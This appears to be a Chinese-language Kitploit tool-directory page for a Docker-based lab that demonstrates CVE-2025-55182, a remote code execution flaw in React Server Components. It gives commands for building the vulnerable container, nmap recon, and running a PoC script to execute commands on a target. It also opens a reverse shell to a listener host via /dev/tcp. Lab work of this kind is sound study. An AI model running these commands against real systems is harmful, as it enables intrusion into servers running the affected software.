Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-55182 — Docker容器中存在漏洞的REACT应用及POC代码 - 用于演示 | Kitploit
工具/GitHubGitHub/ps-interactive/cve-2025-55182
容器安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubps-interactive/cve-2025-55182

cve-2025-55182

Docker容器中存在漏洞的REACT应用及POC代码 - 用于演示

查看仓库
8个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 - React Server Components 远程代码执行漏洞利用

用于 CVE-2025-55182 的 Python CLI 利用工具,这是一个通过 react-server-dom-webpack 利用 React Server Components 的严重 RCE 漏洞。

基于: ejpir/CVE-2025-55182-poc

构建并运行易受攻击的容器

root@kitploit:~
docker build -t cve-2025-55182:lab .
docker run -d -p 3000:3000 --name cve-2025-55182-vuln cve-2025-55182:lab

信息侦察

root@kitploit:~
nmap --script http-title -p 3000 TARGET_IP
nmap --script http-headers -p 3000 TARGET_IP
root@kitploit:~
## Check for vulnerability
python3 poc.py --ip TARGET_IP --port 3000 --post-endpoint "/formaction" --check

远程代码执行

root@kitploit:~
# Recon
python3 poc.py --ip TARGET_IP --port 3000 --post-endpoint "/formaction" --cmd "id"
python3 poc.py --ip TARGET_IP --port 3000 --post-endpoint "/formaction" --cmd "whoami" --no-ssl-verify
root@kitploit:~
# Reverse shell
nc -nlvp 4444
python3 poc.py --ip TARGET_IP --port 3000 --cmd 'bash -c '\''bash -i >& /dev/tcp/LISTENER_IP/4444 0>&1'\'''
下载工具